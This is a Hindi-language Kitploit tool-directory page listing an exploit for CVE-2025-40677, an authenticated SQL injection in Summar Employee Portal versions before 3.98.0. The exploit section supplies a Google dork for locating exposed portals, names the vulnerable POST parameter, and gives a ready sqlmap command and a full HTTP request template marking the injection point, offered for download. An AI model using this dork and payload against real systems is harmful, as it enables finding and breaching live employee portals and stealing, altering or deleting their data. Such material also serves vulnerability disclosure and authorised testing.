Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-40677 — Summar Employee Portal Prior to 3.98.0 Authenticated SQL Injection - CVE-2025-40677 | Kitploit
उपकरण/GitHubGitHub/petergabaldon/cve-2025-40677
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingDatabase Security
GitHubpetergabaldon/cve-2025-40677

CVE-2025-40677

Summar Employee Portal Prior to 3.98.0 Authenticated SQL Injection - CVE-2025-40677

रिपॉजिटरी देखें
110 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शोषण शीर्षक: Summar Employee Portal संस्करण 3.98.0 से पहले प्रमाणित SQL इंजेक्शन - CVE-2025-40677

गूगल डॉर्क: inurl:"/MemberPages/quienesquien.aspx"

दिनांक: 09/22/2025

शोषण लेखक: Peter Gabaldon - https://pgj11.com/

विक्रेता होमपेज: https://www.summar.es/

सॉफ्टवेयर लिंक: https://www.summar.es/software-recursos-humanos/

संस्करण: < 3.98.0

परीक्षित किया गया: Kali

CVE : CVE-2025-40677

विवरण: Summar Software´s Portal del Empleado में SQL इंजेक्शन भेद्यता। यह भेद्यता एक हमलावर को “/MemberPages/quienesquien.aspx” में पैरामीटर “ctl00$ContentPlaceHolder1$filtroNombre” का उपयोग करते हुए POST अनुरोध भेजकर डेटाबेस को पुनः प्राप्त करने, बनाने, अद्यतन करने और हटाने की अनुमति देती है।

root@kitploit:~
$ sqlmap --random-agent -r req.sqli.xml -p 'ctl00%24ContentPlaceHolder1%24filtroNombre' --dbms="MSSQL"

POST /MemberPages/quienesquien.aspx HTTP/1.1
Host: [REDACTED]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
X-Microsoftajax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
 
ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24ContentPlaceHolder1%24lnkVerTrabajador&ctl00%24ContentPlaceHolder1%24filtroNombre=[SQL_INJECTION_POINT]&ctl00%24ContentPlaceHolder1%24ddlEmpresa=&ctl00%24ContentPlaceHolder1%24filtroCentro=&ctl00%24ContentPlaceHolder1%24filtroUO=&ctl00%24ContentPlaceHolder1%24filtroPuesto=&__EVENTTARGET=ctl00%24ContentPlaceHolder1%24lnkVerTrabajador&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=...&__VIEWSTATEGENERATOR=...&__ASYNCPOST=true&
टूल डाउनलोड करें